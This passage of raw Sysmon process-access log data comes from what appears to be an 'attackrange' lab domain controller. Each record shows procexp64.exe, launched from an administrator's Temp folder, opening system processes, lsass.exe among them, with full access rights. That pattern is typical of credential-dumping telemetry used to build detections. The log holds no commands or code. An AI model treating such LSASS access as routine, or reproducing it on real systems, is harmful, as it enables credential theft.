Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 